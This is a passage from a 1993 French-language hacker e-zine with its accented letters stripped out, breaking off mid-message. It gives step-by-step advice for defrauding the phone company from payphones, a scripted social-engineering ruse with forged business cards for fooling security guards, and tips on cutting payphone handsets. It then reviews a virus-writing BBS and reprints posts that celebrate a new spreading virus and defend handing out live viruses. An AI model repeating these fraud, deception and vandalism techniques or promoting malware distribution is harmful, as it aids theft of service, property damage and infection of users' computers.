que vous devez trouver. Pourquoi? Parce que, en plus de fabriquer
des V.42 bis, des V.32bis et des V.33 portatifs, les modems ZyXEL
possdent une caractristique jusqu'
prsent UNIQUE
cette
marque, un "MODE CELLULAIRE". ARQ, ASL, et tout le reste, ce genre
de protocole est la raison qui a fait de USRobotics le modem de
choix pour les amateurs de wares et de PBX de mauvaise qualit.
ZyXEL a dvelopp son propre protocole exclusif qui vous
permettra de faire, lorsque le temps sera venu, du phreak
cellulaire. Et a s'en vient plus vite que vous ne le pensez;
alors, tant qu'
vous acheter un nouveau modem portatif, prvoyez-
donc pour la nouvelle technologie... Sinon, avec n'importe quel
autre marque, vous ne russirez que trs rarement
dpasser le
1200 bauds
partir d'un cellulaire. Remarquez que de toutes
faons, vous allez phreaker d'une cabine tlphonique parce que vos
LD ne vous cotent rien, alors, vous n'tes peut-tre pas obligs
d'y aller en 14.4...
Je viens de parler de hacking
partir de cellulaire. Plusieurs
pirates amricains et canadiens s'y sont dj
mis. Northern Phun
Co. a, je dois l'avouer quelques mois de retard sur son propre
programme de piratage de cellulaire. Mais on va s'y mettre bientt,
vous allez voir! Invitablement, il va falloir abandonner nos vieux
systmes. La tlphonie sans fil est
nos portes. A preuve ce
petit article...
Leeched from LE JOURNAL BELL - 25 janvier 1993
Les premiers rseaux de tlphonie sans fil pourraient tre
oprationnels pour la fin de 1993. Marie Caron, directrice des
communications chez Bell Mobilit Cellulaire, considre en effet
que les premires communications sans fil pourraient tre tablies
au Canada
la fin de 93 ou au dbut de 94.
Fin dcembre, un pas important tait d'ailleurs franchi dans
cette direction. Le ministre des Communications du Canada, Perrin
Betty, dlivrait alors quatre licences
autant de compagnies les
autorisant
offrir un service tlphonique public sans fil sur
l'ensemble du territoire canadien.
Pas plus gros qu'une calculatrice, le tlphone sans fil se
glissera dans la poche ou dans le sac
main. Il fonctionnera
partout o seront installes des bases spciales. Une fois le
rseau mis en place, les usagers pourront faire ou recevoir des
appels au bureau aussi bien qu'
la maison, au restaurant ou au
centre commercial.
Bell Canada, qui est engage activement dans la recherche sur
la tlphonie sans fil depuis 1990, assiste avec enthousiasme
l'implantation de cette technologie. La compagnie continuera d'en
appuyer le dveloppement, notamment en offrant l'accs au rseau
tlphonique public.
LES QUATRE COMPAGNIES RETENUES
Sept entreprises taient en lice pour la prestation des
service de tlphonie sans fil. Le ministre des Communications a
dcid d'accorder des licences
quatre d'entre elles. Ce sont:
--Canada Popfone Corp.,un consortium d'entreprises de
communications sous la direction de Call-Net Entreprises Ltd.,
--Mobility Personacom Ltd., un consortium des filiales des
partenaires de Stentor spcialises dans la tlphonie cellulaire,
--Rogers Cantel Mobile Inc., une socit de tlphonie cellulaire
de Toronto,
--Telezone, un consortium national regroupant surtout des
entreprises qui offrent des services de recherche de personne.
- 30 -
C'est Bell lui-mme qui nous presse de modifier nos habitudes de
piratage! Et comme nous coutons toujours le Bell...
Mais on n'est pas encore dans les cellulaires cette semaine... Nous
sommes dans les cabines tlphoniques, nous avons le portatif, le
modem, et... mais o branche-t'on ce maudit modem?
Ha ha! Vous cherchez un jack (RJ-11) et vous n'en trouvez pas!
C'est donc mal pens, ces cabines-l
! En effet,
part dans les
aroports, vous ne rencontrerez que trs rarement des cabines avec
des prises de tlphone vous permettant de brancher votre modem. Il
faut donc faire appel
un coupleur acoustique. Un coupleur, c'est
un espce de handset qui va relier l'acoustique du tlphone de la
cabine
votre modem. Radio-Schack en a parfois, sinon faites
marcher vos doigts et cumez les pages jaunes dans les rubriques
"lectronique" et "Tlphonie". Vous pouvez encore appeler chez
Addison,
Montral, et vous faire envoyer le catalogue. Vous
trouverez des coupleurs acoustiques dans la section Industrielle...
Le numro de Addison est 514-376-1740. Sinon, il y a cette
compagnie amricaine, Unlimited Systems Corp., de San Diego, qui
vend un kit complet de voyage (Coupleur Konexx Modle 203, adapteur
tlphonique Merlin, batterie 9 volts, etc) pour 169 $US. Commandez
au 1-800-275-6354.
JE SUIS CASS, MAIS JE SUIS QUIP! QUE DOIS-JE FAIRE?
Je dbute, mais j'ai du beat!
Quelques petits conseils pour les hackers nomades. Il y a fort
parier que si vous choisissez de frquenter les endroits publics en
fin de soire, un agent de scurit plus curieux que les autres va
vous demander ce que vous faites avec un ordi branch sur le
tlphone. Encore une fois, ce genre de rencontre est moins
embarrassant au Mail St-Roch, parce que l'intrieur du Mail est
public, contrairement
la plupart des centres d'achats (les gens
de 2600 D.C. en savent quelque chose...). Il y a des gens qui
VIVENT dans des appartements, des chambres plutt, qui donnent sur
le mail. Vous pouvez de plus vous mler
la foule des poivrots qui
hante ces lieux. Les agents sont beaucoup plus cools. Ceci dit,
vous pouvez toujours les bullshitter. Un truc que j'utilise, c'est
celui du journaliste de passage
Qubec. Voici comment procder:
1) Achetez-vous une revue parlant de voyage dans un kiosque: Cond
Nast a de belles photos...
2) Trouvez-vous une machine
fabriquer des cartes d'affaires
automatique. Il y en a une
Place Qubec, juste au dessus des
anciens cinmas.
3) Trouvez-vous un nom plausible et totalement inconnu parmi les
collaborateurs de la revue. Faites-vous quatre ou cinq cartes avec
ce nom, et rajoutez des dtails comme des numros de tlphone dans
le 416 ou le 613, un numro de fax, la mention "REPORTER FOR HIRE"
sous le nom, ce qui vous chante quoi.
Vous voil
arm pour toute sance de social engineering qui
pourrait se prsenter. Ca pourrait ressembler
ca...
Je suis en train de fumer une cigarette, appuy contre le
tlphone, en attendant que le d/l se termine. Le couvercle de mon
portatif est quasiment referm, histoire qu'un ventuel emmerdeur
ne voit pas ce qui s'y passe. Un agent de scurit s'aproche pour
faire un brin de jasette.
Agent - "Que faites-vous l
?"
Vous - "J'envoie un papier
la salle de rdaction."
Agent - "Vous faites quoi?"
Vous sortez de manire tout
fait dbonnaire une carte de votre
poche de chemise - "Peter Zwygboski, collaborateur occasionnel
la
revue Cond Nast." Vous sortez le dernier numro de la poche de
votre veston, et lui tendez. "Connaissez-vous cette revue?"
Agent - "Non, jamais entendu parler" (Ne soyez pas dmonts, il est
bien connu que ces gens ne savent pas lire...)
Vous - "Regardez
la page 83, il y a un article de moi sur les
torrides tortues du Totuba Tabo..." (Ca aiderait que vous ayez jet
un coup d'oeil
l'article en question, et que vous lui rpondiez
dans un franais cass)
Agent - (Aprs avoir regard l'article) "Ca m'explique toujours pas
ce que vous faites l
".
Vous - "Vous connaissez les technologies modernes, je suppose.
J'envoie par ordinateur mon texte sur Qubec au bureau de New-York
pour le prochain numro."
Agent - (Il a vraiment du temps
perdre, ce con) "Pourquoi vous
faites pas a de votre chambre d'htel?"
Vous - "Je n'ai pas de chambre justement. Je suis stationn dans
la rue, et je prends quelques minutes pour envoyer mon texte. Je
dois continuer sur Charlevoix cette nuit, parce qu'on m'a demand
de faire un papier sur cette rgion
la lumire de l'implantation
prochaine des casinos."
Gnralement, l'agent tourne les talons
ce moment l
... Courez
aprs pour rcuprer votre revue, avec un grand sourire!
Variantes: vous mesurez 4'6", et n'avez manifestement pas plus de
16 ans: vous tes un tudiant d'une cole de Montral venu faire un
papier pour le journal de l'association sur la course
l'exploit
telle qu'elle se pratique
Qubec. Vous aurez pris une cabine pas
loin d'un htel, et vous oublierez l'histoire des cartes
d'affaires.
Ou vous avez moins de trente ans, mais ne paraissez pas tre un
collgien. Changez la revue pour un mag sur le skateboard, et
travaillez sur une explication de circonstance...
Quoiqu'il arrive, l'agent de scurit, au pire (VRAIMENT AU PIRE!)
ne peut que vous demander de quitter les lieux. Vous remballez
tranquillement votre stuff.
Une autre manire de ne pas tre emmerd, pour ceux qui ne seraient
pas tents par le social engineering. Allez dans une cabine
extrieure avec un cutter et sectionnez l'acoustique au ras de la
bote. Dguerpissez... Lorsque vous serez
la cabine d'o vous
voulez placer votre appel, ploguez tout votre stock, dposez le sur
la tablette, et lorsque votre d/l est parti, recouvrez le tout avec
un manteau. Si quelqu'un s'amne, plantez-vous devant la cabine et
faites semblant de parler dans L'AUTRE acoustique, celle qui ne
sert
rien, celle que vous avez chaparde. Ils n'y verront que du
feu... garanti....
Un dernier truc: ne retournez jamais deux fois dans la mme cabine.
Ce serait courir un risque inutile au cas, fort improbable, o des
agents du Bell seraient posts, dans l'espoir que le fraudeur
revienne. Avec un gros marqueur au crayon feutre, un marqueur
INDLBILE, faites une marque sur la cabine d'o vous venez de
pirater, avec la date, de manire
ce qu'un autre pirate qui
passerait par l
quelques jours plus tard sache que cette cabine
est peut-tre surveille. crivez un gros "NPC" sur la fentre de
plexi sur le ct de la cabine. C'est un signe de reconnaissance
qui en vaut bien un autre...
Et dites: MERCI NPC!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
ON VEUT VOTRE BIEN, ET ON VA L'AVOIR!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
CHRIE, BARRE LES PORTES, ON SORT...
Visite d'un co0l board: Cybernetic Violence
par
Santa Claus
Greets: Pure Energy (Autorisation)
Salut les mecs, content de vous revoir.
Fin de la formule de politesse.
Pour ce numro, soit dit en passant, exceptionnel,
c'est le Cybernetic Violence qui va passer au broyeur. Ce
board est exclusivement H/P/C/A/V et a dj
sa rputation de
faite.
Histoire de voir un peu de pays, on va suivre la recette
originelle... On ne brise pas une combinaison gagnante... Et pas de
"J'en ai rien
foutre de c'te place l
!", C'est quand mme de
notre chre patrie dont on parle ici. Pas seulement de notre
patrie le cyberspace, mais c'est un board qubcois... Et puis il
est, disons, "suprieur
beaucoup d'autres", pour ne pas outrer
personne avec un autre terme qui pourrait ne pas convenir...
(Elite...)
Mais faut croire que la qualit des boards en gnral a baiss
depuis la fermeture du dfunt Blitzkrieg... Et si par pur hasard le
NPC-004 tombait entre les mains de l'ex-sysop de Blitzkrieg BBS,
prire de nous contacter... Nous sommes en deuil... (Un peu de
tenue, c'est quand mme la fin du monde...)
Je disais donc? Ah! Oui... Le Cybernetic: histoire de ne pas
perdre de temps, on va commencer... Faudrait pas que
j'empite sur les plates-bandes des autres... Allez!
Welcome to Cybernetic Violence - NuKE/NuKENet WHQ - (1:950/0),
NuKE / NuKENet World HeadQuarters
SysOp: Pure Energy
Co-SysOp: Rock Steady
- Running With a 16.8 K HST
- H/P/C/A/V Only
- NuKE Member board
- NuKeNeT Whq
- InterNet/Usenet Node (Virus.Comp)
Cybernetic Violence est le World HeadQuarter de NuKE, un groupe
principalement ax sur les virii. Pour vous situer un peu, les deux
leaders, ma foi, incontests, du monde des virii sont NukE et
Phalcon/Skism. Au got de Blitz, cependant, rien n'approche la
qualit des messageries du NuKENeT, toujours en ce qui concerne les
virii. Et on va vous en faire la preuve. NuKENeT est un des nets
underground les plus recherchs par les babs dignes de ce nom. Il
se rpand partout en Europe (avec des nodes officielles en Suisse,
notamment) et en Australie (mate!).
Voici d,ailleurs certaines de nodes officielles de NukE...
NuKE-NeT
BBS Name ÃÙÀ ´ Number ÃÙÀ´ Location ÃÙ À´ SysOp ÃÙÀ´ Node
Cybernetic Violence 514-385-XXXX Montreal Pure Energy 1:950/0
Disintegration Zone 514-PRI-VATE Montreal Rock Steady 1:950/1
The Hell Pit 708-459-XXXX Illinois Kato & Hades1:950/2
Total Mayhem +61-3-PRIVATE Australia Phrozen Doberman
1:950/3
The Pit +61-3-742XXXX Australia Greyswandir 1:950/4
Brain Damage 819-778-XXXX Hull Dark Angel 01:950/5
PhunLine ][ +46-8-716XXXX Sweden Ford Fairlane
1:950/6
Land of Silence 418-687-XXXX Quebec City CoaxialKarma1:950/7
Enigma E:N:U:N +41-22-340XXXX Switzerland Savage Beast1:950/8
Demoralized City +46-31-91XXXX Sweden Tormentor 1:950/9
Power House BBS 416-692-XXXX Toronto Thunder 1:950/10
NuKE compte parmi ses rangs des noms aussi prestigieux que Rock
Steady ou le fameux Nowhere Man, le crateur du dsormais clbre
VCL.
DISTRIBUTION DES MESSAGERIES
General Topics [NuKENeT]
Anti-Viral Talk [NuKENeT]
ASM Programming [NuKENeT]
Unix Systems [NuKENeT]
Phreaking Away [NuKENeT]
System Entry [NuKENeT]
NuKE/SCP Public [NuKENeT]
Comp.Virus (Internet)[NuKENeT]
Alt.Security [NuKENeT]
On va tout d'abord visiter la messagerie la plus pte de toutes,
Anti-Viral Talk. C'est pas compliqu, pour le commun des mortels,
ce type de discussion ressemble
du serbo-croate...
Msg #: [104/121] Base: Anti-Viral Talk [NuKENeT]
Date : 17 Jan 93 19:26:34 Stat: Sent
From : Arthur Ellis
To : All
Title: Virus Statistics
I have not seen any good statistical analyses of viruses, with the
exception of the various MtE tests. So here is a beginning. A
program called CHKINT was used to detect possible interrupts by
scanning for CDh opcodes. This is an approximate measure only.
Frequency of Interrupts in a sample of 908 different .COM type
viruses, sampled using CHKINT.EXE.
Freq int fn | Freq int fn | Freq int fn | Freq int fn
----------------|---------------|---------------|---------------
24 00h 01h | 3 00h 02h | 6 00h 03h | 2 00h 04h
2 00h 05h | 1 00h 06h | 1 00h 44h | 28 01h 01h
4 01h 02h | 1 01h 04h | 1 01h 06h | 1 01h 17h
15 02h 01h | 3 02h 02h | 2 02h 03h | 1 02h 06h
10 03h 01h | 2 03h 02h | 1 03h 03h | 1 03h 05h
1 03h 07h | 14 04h 01h | 1 04h 02h | 2 04h 03h
1 04h 07h | 10 05h 01h | 4 05h 02h | 1 05h 03h
3 05h 04h | 13 06h 01h | 5 06h 02h | 11 07h 01h
5 07h 02h | 1 07h 23h | 1 07h FAh | 7 08h 01h
5 08h 02h | 1 08h 12h | 7 09h 01h | 4 09h 02h
7 0Ah 01h | 1 0Ah 02h | 7 0Bh 01h | 1 0Bh 02h
1 0Bh 03h | 2 0Bh 04h | 3 0Bh 07h | 5 0Ch 01h
7 0Dh 01h | 1 0Dh 03h | 1 0Dh 06h | 9 0Eh 01h
1 0Eh 02h | 7 0Fh 01h | 1 0Fh 03h |125 10h 01h
25 10h 02h | 37 10h 03h | 8 10h 04h | 5 10h 05h
11 10h 06h | 6 10h 07h | 3 10h 08h | 5 10h 09h
4 10h 0Ah | 1 10h 0Bh | 3 10h 0Ch | 1 10h 0Dh
1 10h 0Eh | 2 10h 0Fh | 1 10h 10h | 2 10h 12h
2 10h 14h | 3 10h 15h | 1 10h 1Eh | 8 11h 01h
3 11h 02h | 2 11h 05h | 16 12h 01h | 2 12h 02h
1 12h 03h | 79 13h 01h | 31 13h 02h | 15 13h 03h
15 13h 04h | 11 13h 05h | 10 13h 06h | 1 13h 07h
4 13h 08h | 5 13h 09h | 6 13h 0Ah | 1 13h 0Bh
1 13h 0Ch | 4 14h 01h | 2 14h 02h | 1 14h 03h
1 14h 04h | 1 14h 05h | 11 15h 01h | 6 15h 02h
2 15h 03h | 1 15h 04h | 1 15h 06h | 1 15h 1Bh
34 16h 01h | 28 16h 02h | 3 16h 03h | 4 16h 04h
2 16h 05h | 2 16h 06h | 1 16h 0Ah | 9 17h 01h
2 17h 02h | 1 17h 03h | 4 18h 01h | 2 18h 02h
30 19h 01h | 7 19h 02h | 55 1Ah 01h | 14 1Ah 02h
16 1Ah 03h | 1 1Ah 04h | 1 1Ah 06h | 4 1Bh 01h
1 1Bh 02h | 1 1Bh 03h | 6 1Ch 01h | 4 1Ch 02h
3 1Ch 03h | 4 1Dh 01h | 1 1Dh 02h | 1 1Dh 04h
1 1Dh 06h | 3 1Eh 01h | 3 1Eh 02h | 2 1Fh 01h
1 1Fh 02h | 1 1Fh 03h | 1 1Fh 44h |351 20h 01h
75 20h 02h | 14 20h 03h | 15 20h 04h | 3 20h 05h
1 20h 09h | 87 21h 01h | 44 21h 02h | 17 21h 03h
18 21h 04h | 16 21h 05h | 20 21h 06h | 14 21h 07h
21 21h 08h | 29 21h 09h | 41 21h 0Ah | 17 21h 0Bh
24 21h 0Ch | 18 21h 0Dh | 15 21h 0Eh | 28 21h 0Fh
14 21h 10h | 24 21h 11h | 25 21h 12h | 14 21h 13h
33 21h 14h | 19 21h 15h | 23 21h 16h | 21 21h 17h
21 21h 18h | 16 21h 19h | 5 21h 1Ah | 6 21h 1Bh
10 21h 1Ch | 12 21h 1Dh | 5 21h 1Eh | 5 21h 1Fh
2 21h 20h | 5 21h 21h | 3 21h 22h | 8 21h 23h
6 21h 24h | 7 21h 25h | 8 21h 26h | 4 21h 27h
6 21h 28h | 3 21h 29h | 2 21h 2Ah | 5 21h 2Bh
4 21h 2Ch | 9 21h 2Dh | 25 21h 2Eh | 10 21h 2Fh
5 21h 30h | 2 21h 31h | 1 21h 32h | 5 21h 33h
1 21h 37h | 1 21h 38h | 1 21h 39h | 1 21h 3Ah
4 21h 3Bh | 2 21h 3Ch | 1 21h 3Eh | 1 21h 40h
1 21h 42h | 1 21h 44h | 1 21h 47h | 1 21h 48h
1 21h 49h | 1 21h 4Dh | 1 21h 4Eh | 1 21h 54h
2 21h 57h | 1 21h 59h | 2 21h 5Ch | 1 21h 64h
1 21h 65h | 1 21h 67h | 1 21h 79h | 1 21h 7Ch
1 21h 84h | 1 21h 8Bh | 3 21h F0h | 3 22h 01h
6 23h 01h | 1 23h 02h | 11 24h 01h | 1 24h 0Ah
18 25h 01h | 7 25h 02h | 3 25h 03h | 1 25h 04h
74 26h 01h | 18 26h 02h | 1 26h 03h | 2 26h 04h
3 26h 05h | 1 26h 0Ch | 33 27h 01h | 1 27h 02h
5 28h 01h | 2 28h 02h | 7 29h 01h | 7 2Ah 01h
3 2Ah 03h | 13 2Bh 01h | 1 2Bh 06h | 8 2Ch 01h
13 2Dh 01h | 1 2Dh 02h | 18 2Eh 01h | 11 2Fh 01h
19 2Fh 02h | 9 2Fh 03h | 16 2Fh 04h | 4 2Fh 06h
2 2Fh 08h | 1 2Fh 09h | 1 2Fh 0Ch | 1 2Fh 1Ah
1 2Fh 20h | 1 2Fh 2Ah | 5 30h 01h | 1 30h 34h
1 30h 38h | 1 31h 01h | 1 31h 03h | 6 32h 01h
1 32h 03h | 2 32h 06h | 5 32h 07h | 2 32h 1Ah
19 33h 01h | 1 33h 04h | 4 34h 01h | 5 35h 01h
1 35h 06h | 1 35h 08h | 7 36h 01h | 5 37h 01h
3 37h 03h | 1 37h 09h | 3 38h 01h | 5 39h 01h
1 39h 12h | 11 3Ah 01h | 1 3Ah 03h | 10 3Bh 01h
1 3Bh 05h | 1 3Bh 07h | 6 3Ch 01h | 6 3Dh 01h
1 3Dh 0Dh | 1 3Eh 01h | 1 3Eh 02h | 3 3Eh 03h
7 3Fh 01h | 37 40h 01h | 2 40h 02h | 1 40h 03h
1 41h 02h | 5 42h 01h | 1 43h 01h | 1 43h 02h
3 44h 01h | 1 44h 02h | 7 45h 01h | 1 45h 02h
2 45h 03h | 9 46h 01h | 6 47h 01h | 1 47h 02h
3 48h 01h | 1 48h 02h | 6 49h 01h | 5 4Ah 01h
3 4Bh 01h | 1 4Bh 03h | 1 4Ch 05h | 6 4Dh 01h
1 4Dh 03h | 7 4Eh 01h | 8 4Fh 01h | 1 4Fh 02h
1 4Fh 16h | 10 50h 01h | 2 50h 05h | 1 50h 36h
4 51h 01h | 2 51h 02h | 3 52h 01h | 1 52h 02h
2 53h 01h | 7 54h 01h | 5 55h 01h | 3 56h 01h
1 56h 02h | 6 57h 01h | 2 58h 01h | 2 58h 02h
9 59h 01h | 2 59h 02h | 6 5Ah 01h | 1 5Ah 02h
7 5Bh 01h | 4 5Ch 01h | 4 5Dh 01h | 4 5Eh 01h
4 5Fh 01h | 4 60h 01h | 2 60h 02h | 5 61h 01h
1 61h 0Bh | 3 62h 01h | 1 62h 02h | 3 63h 01h
1 63h 02h | 1 63h 03h | 1 64h 01h | 2 64h 02h
1 64h 14h | 7 65h 01h | 2 66h 01h | 1 66h 02h
8 67h 01h | 2 67h 05h | 1 67h 08h | 1 67h 23h
1 68h 01h | 3 69h 01h | 1 69h 04h | 2 69h 05h
1 69h 06h | 1 69h 10h | 7 6Ah 01h | 1 6Ah 03h
4 6Bh 01h | 1 6Bh 02h | 2 6Bh 10h | 3 6Ch 01h
2 6Dh 02h | 1 6Dh 05h | 1 6Dh 06h | 1 6Dh 07h
1 6Dh 0Ch | 7 6Eh 01h | 1 6Fh 01h | 1 70h 02h
1 70h 0Bh | 2 70h 10h | 1 70h 20h | 1 71h 01h
4 72h 01h | 1 72h 02h | 1 72h 04h | 7 73h 01h
1 73h 02h | 1 73h 07h | 15 74h 01h | 3 74h 02h
5 74h 03h | 1 74h 07h | 8 75h 01h | 7 75h 02h
2 76h 01h | 2 76h 02h | 3 77h 01h | 3 78h 01h
1 78h 03h | 8 79h 01h | 3 7Ah 01h | 4 7Bh 01h
3 7Bh 05h | 4 7Ch 01h | 2 7Dh 01h | 2 7Eh 01h
1 7Eh 14h | 4 7Fh 01h | 1 7Fh 02h | 4 7Fh 03h
1 7Fh 06h | 30 80h 01h | 3 80h 02h | 2 80h 03h
1 80h 04h | 1 80h 08h | 7 81h 01h | 1 81h 02h
1 81h 06h | 4 82h 01h | 14 83h 01h | 3 83h 02h
1 83h 0Bh | 5 84h 01h | 1 84h 05h | 1 85h 01h
5 86h 01h | 2 87h 01h | 1 87h 02h | 1 87h 03h
1 88h 01h | 1 88h 02h | 1 88h 03h | 3 89h 02h
1 89h 12h | 9 8Ah 01h | 1 8Ah 02h | 1 8Ah 03h
1 8Ah 3Ah | 23 8Bh 01h | 1 8Bh 09h | 4 8Ch 01h
1 8Ch 02h | 6 8Dh 01h | 1 8Dh 02h | 12 8Eh 01h
1 8Eh 02h | 3 8Fh 01h | 2 90h 01h | 1 90h 02h
2 90h 03h | 7 91h 01h | 5 92h 01h | 3 93h 01h
2 94h 01h | 5 95h 01h | 3 96h 01h | 1 96h 02h
2 97h 01h | 1 98h 01h | 1 98h 02h | 3 99h 01h
1 99h 03h | 2 9Ah 01h | 1 9Bh 02h | 3 9Ch 01h
8 9Dh 01h | 2 9Eh 01h | 6 9Fh 01h | 5 A0h 01h
1 A0h 02h | 1 A0h 03h | 8 A1h 01h | 1 A1h 1Ah
2 A2h 01h | 1 A2h 03h | 3 A3h 01h | 1 A3h 0Dh
1 A4h 01h | 1 A4h 02h | 2 A5h 01h | 2 A6h 01h
5 A7h 01h | 1 A7h 03h | 3 A8h 01h | 1 A9h 01h
1 A9h 02h | 8 AAh 01h | 8 ABh 01h | 3 ABh 02h
2 ABh 03h | 3 ABh 04h | 1 ABh 06h | 8 ACh 01h
4 ADh 01h | 2 AEh 01h | 2 AFh 01h | 6 B0h 01h
2 B0h 02h | 5 B1h 01h | 3 B2h 01h | 2 B3h 01h
4 B4h 01h | 1 B4h 07h | 3 B5h 01h | 2 B5h 02h
1 B5h 04h | 3 B6h 01h | 4 B7h 01h | 15 B8h 01h
7 B8h 02h | 1 B8h 03h | 1 B8h 0Dh | 1 B9h 01h
1 B9h 02h | 11 BAh 01h | 1 BAh 04h | 10 BBh 01h
1 BBh 02h | 3 BBh 03h | 7 BCh 01h | 2 BCh 02h
4 BDh 01h | 3 BEh 01h | 6 BEh 03h | 6 BFh 01h
1 BFh 02h | 1 BFh 05h | 3 C0h 01h | 5 C1h 01h
1 C1h 02h | 3 C2h 01h | 2 C2h 02h | 3 C3h 01h
8 C4h 01h | 2 C5h 01h | 5 C6h 01h | 1 C6h 02h
1 C7h 02h | 4 C8h 01h | 4 C9h 01h | 1 C9h 02h
1 CAh 01h | 1 CAh 02h | 4 CBh 01h | 6 CCh 01h
5 CCh 02h | 5 CDh 01h | 8 CDh 02h | 2 CDh 04h
1 CDh 06h | 1 CDh 10h | 1 CDh 14h | 2 CDh 18h
1 CDh 1Eh | 1 CDh 2Eh | 1 CDh 3Eh | 1 CDh 42h
2 CDh 47h | 1 CDh 4Eh | 1 CDh 68h | 1 CDh 71h
1 CDh 97h | 13 CEh 01h | 1 CEh 09h | 2 CFh 01h
2 CFh 02h | 1 CFh 06h | 4 D0h 01h | 1 D0h 09h
2 D1h 01h | 2 D1h 02h | 1 D1h 05h | 6 D2h 01h
1 D2h 05h | 5 D3h 01h | 1 D3h 07h | 1 D4h 01h
5 D6h 01h | 5 D7h 01h | 1 D7h 04h | 9 D8h 01h
1 D8h 03h | 2 D9h 01h | 4 DAh 01h | 9 DBh 01h
4 DCh 01h | 2 DDh 01h | 1 DDh 02h | 1 DEh 01h
1 DFh 01h | 1 DFh 02h | 3 E0h 01h | 1 E0h 02h
1 E0h 06h | 2 E1h 01h | 1 E1h 02h | 2 E2h 01h
2 E2h 02h | 25 E3h 01h | 1 E3h 02h | 2 E4h 01h
2 E4h 02h | 1 E5h 01h | 1 E5h 02h | 2 E6h 01h
1 E6h 02h | 1 E7h 01h | 1 E7h 02h | 6 E8h 01h
1 E8h 15h | 4 E9h 01h | 1 E9h 02h | 1 E9h 05h
1 EAh 01h | 14 EBh 01h | 1 EBh 06h | 2 ECh 01h
1 ECh 03h | 1 ECh 17h | 1 ECh 1Ah | 2 EDh 01h
1 EDh 02h | 4 EEh 01h | 4 EFh 01h | 5 F0h 01h
1 F0h 05h | 1 F1h 02h | 1 F2h 01h | 18 F3h 01h
8 F4h 01h | 8 F5h 01h | 3 F6h 01h | 2 F6h 07h
4 F7h 01h | 2 F8h 01h | 2 F8h 07h | 2 F9h 01h
1 F9h 02h | 4 FAh 01h | 7 FBh 01h | 1 FBh 02h
12 FCh 01h | 3 FCh 02h | 4 FDh 01h | 3 FDh 02h
13 FEh 01h | 1 FEh 03h
/\
< AE >
\/
--- Msged/sq
* Origin: Cyber City (40:2/2)
Msg #: [105/121] Base: Anti-Viral Talk [NuKENeT]
Date : 18 Jan 93 01:37:01 Stat: Sent
From : Aristotle
To : Arthur Ellis
Title: Virus Statistics
If you use that on a STEM and LEAF diagram, then the information you gave
would be beneficial to me for sure!
ARiSToTLE
--- GEcho 1.00/beta+
* Origin: If at first you don't succeed...Dig deeper into the melon!
(40:1/13)
Msg #: [109/121] Base: Anti-Viral Talk [NuKENeT]
Date : 22 Jan 93 00:32:02 Stat: Sent
From : Terminator Z
To : All
Title: OK
OK Hot off the press! New virus!
COM/EXE/BIN/OVL/SYS Parasitic Resident Polymorphic Multipartite Stealth
virus, >>> 2048 bytes <<<! Well this beast sure does spread... get your
hands on it..
DaeMaen virus by TaLoN ! Infects floppy boot sectors/ Hard Disk partition
tables as well as the above. Will infect Hd on boot from infected floppy
OR execution of infected file , including SYS file .. So Well there you
go recipe for instant success. Gonna scare the shit outa the AV world,
but then again they need one every once in a while. ...
Anyway happy times.
TZ
--- FMail 0.92
* Origin: -/- ToTAL MAYHEM - JE NE REGRETTE RiEN -/- (1:950/3)
Msg #: [112/121] Base: Anti-Viral Talk [NuKENeT]
Date : 24 Jan 93 15:05:01 Stat: Sent
From : Digital Justice
To : All
Title: New News!
Well, I got something to say to all you "VX" people out there, and I
think you'll find this quite interesting, so sit back and open your
ears.
I run the Virus Syndicate BBS here in the DC area. I have been
running this system for about 2 years now. It's nothing huge, but it
serves it's purpose - making viruses and source code available to
those who want/need them. Well, I got a new user the other day...Mr.
Aryeh Goretsky...one of McAfee's cohorts. He created a new account
using his real name and left me feedback requesting access. Since I
have no problem with this, I gave him normal system access. I
decided to voice him first to actually make sure it was indeed him
who called. I spoke with him for a few minutes and it was him who
called. I asked him why he wanted on and he said something about
hearing that it was an "interesting" system and someone in the 804
area code told him to check it out.
About two days went by and he hadn't called back. I called him and
started asking more questions. I wanted to know his specific purpose
in calling. He admitted to me that he called mainly to check out the
log on screen I have. What I did was capture McAfee's BBS intro
screen, alter it a bit with my own information, and use it as my
opening shell. He told me that two things could be wrong with this.
First, the term "The Virus Help Forum" trademark of McAfee
Associates. Second, he wanted to check and see if my using it
constituted slander. He captured everything and handed it all over
to their lawyers. I informed Mr. Goretsky that I already checked
with two separate lawyers and they already checked into this matter
for me. I told him that he should have their lawyers better spend
their time and resources fighting another battle that's going on (you
all know what I'm talking about...I hope). I also told him that I've
asked the U.S. Secret Service about my BBS violating any known
federal statutes and also checked into it on a state and
international level. Everyone told me the same thing...that what I
wanted to do was not illegal.
I make live viruses and source code available on my system for almost
anyone who wants them. I do not encourage people to download them,
do not encourage people to UNZIP them, do not encourage people to run
them, give away copies, or spread them in any manner. I just make
them available...that's it. The only thing I ask is that people
contribute something...like an occasional upload. It takes a long
time and, at times, money, to make them available. All my viruses
have ZIP comments telling you what they are. Everything is very
clear here...no gimmicks at all.
Several years back, I was the one looking for viruses. I was a
